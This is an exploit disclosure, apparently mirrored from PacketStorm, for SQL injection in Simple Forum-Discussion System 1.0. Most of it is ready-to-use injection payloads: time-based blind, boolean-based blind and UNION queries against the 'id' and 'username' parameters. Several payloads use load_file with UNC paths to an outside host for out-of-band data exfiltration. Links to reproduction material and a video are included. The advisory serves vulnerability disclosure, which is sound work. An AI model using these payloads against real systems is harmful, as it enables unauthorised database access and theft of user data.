Share
## https://sploitus.com/exploit?id=PACKETSTORM:165247
## [Simple Forum-Discussion System  
1.0](https://www.sourcecodester.com/php/14525/simple-forumdiscussion-system-using-phpmysql-source-code.html)  
  
## [Vendor](https://www.sourcecodester.com/users/tips23)  
  
![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/Forum-Discussion-System-1.0/docs/forum.png)  
  
## Description:  
Multiple SQL-Injections are found on Simple Forum-Discussion System  
1.0 For example on three applications which are manage_topic.php,  
manage_user.php, and ajax.php. The attacker can be retrieving all  
information from the database of this system by using this  
vulnerability.  
  
  
[+]Payloads:  
  
```mysql  
Parameter: id (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=(select  
load_file('\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\nix'))  
AND (SELECT 4985 FROM (SELECT(SLEEP(5)))Eggb)  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 4 columns  
Payload: id=(select  
load_file('\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\nix'))  
UNION ALL SELECT  
NULL,NULL,CONCAT(0x7162627871,0x564c7a5164475979514c4879487159576946726147756c7746504d696a5a6c6554547345776f4d61,0x716a7a7171),NULL,NULL,NULL--  
-  
```  
  
  
```mysql  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=135628119 or 8604=08604 AND 5328=5328&mtype=own  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=135628119 or 8604=08604 AND (SELECT 6263 FROM  
(SELECT(SLEEP(5)))lewZ)&mtype=own  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 5 columns  
Payload: id=-6332 UNION ALL SELECT  
CONCAT(0x7176766b71,0x4b717847474f67485458796b544c50486c656e637779445a6c506b63756d564a544f665364557772,0x7171707871),NULL,NULL,NULL,NULL--  
-&mtype=own  
```  
  
  
```mysql  
Parameter: username (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=GnxaCRMw'+(select  
load_file('\\\\p2s8tasb7fditu3yy21otus6sxyqmjg77av2is6h.nu11secur1tyPenetrationTestingEngineer.net\\fnu'))+''  
AND (SELECT 1271 FROM (SELECT(SLEEP(5)))MBvz) AND  
'eIbF'='eIbF&password=t4F!v8o!H8  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Forum-Discussion-System-1.0)  
  
## Proof and Exploit:  
[href](https://streamable.com/439w8c)